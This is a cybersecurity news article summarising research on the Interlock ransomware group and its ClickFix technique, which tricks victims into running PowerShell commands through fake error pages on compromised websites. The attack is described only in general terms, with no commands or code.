Interlock Ransomware Utilizes ClickFix Method to Execute Harmful Commands on Windows Systems

The cybersecurity landscape continues to evolve as threat actors develop increasingly sophisticated methods to compromise Windows systems. A new ransomware variant known as Interlock has emerged as a significant threat, leveraging the deceptive ClickFix social engineering technique to execute malicious commands on victim machines. This malware represents a concerning evolution in ransomware deployment tactics, combining traditional phishing approaches with advanced multi-stage payload delivery mechanisms. Interlock ransomware has actively targeted organisations across North America and Europe since September 2024, demonstrating a clear financial motivation through its double extortion methodology. The threat group behind this malware has shown remarkable persistence and technical sophistication, employing a complex attack chain that begins with compromised websites and culminates in full system compromise. The malware’s ability to fingerprint victim systems and prioritise high-value targets indicates a well-resourced operation with strategic objectives.

In July 2025, eSentire analysts identified multiple sophisticated incidents attributed to the Interlock Group, revealing the ransomware’s evolving capabilities and attack methodologies. Security researchers discovered that the threat actors had developed a multi-layered approach involving PowerShell scripts, PHP backdoors, and custom-built remote access tools. This comprehensive analysis has provided crucial insights into the malware’s operational tactics, techniques, and procedures, offering the cybersecurity community valuable intelligence for defensive measures. The attack begins when victims unknowingly visit compromised websites, particularly those infected through the KongTuke compromise chain, which subsequently redirect users to malicious ClickFix pages. ClickFix represents a social engineering technique that deceives victims into executing harmful commands by presenting fake error messages or system notifications that appear legitimate. Upon interaction with these deceptive elements, victims are prompted to copy and execute PowerShell commands that appear to resolve fictitious technical issues.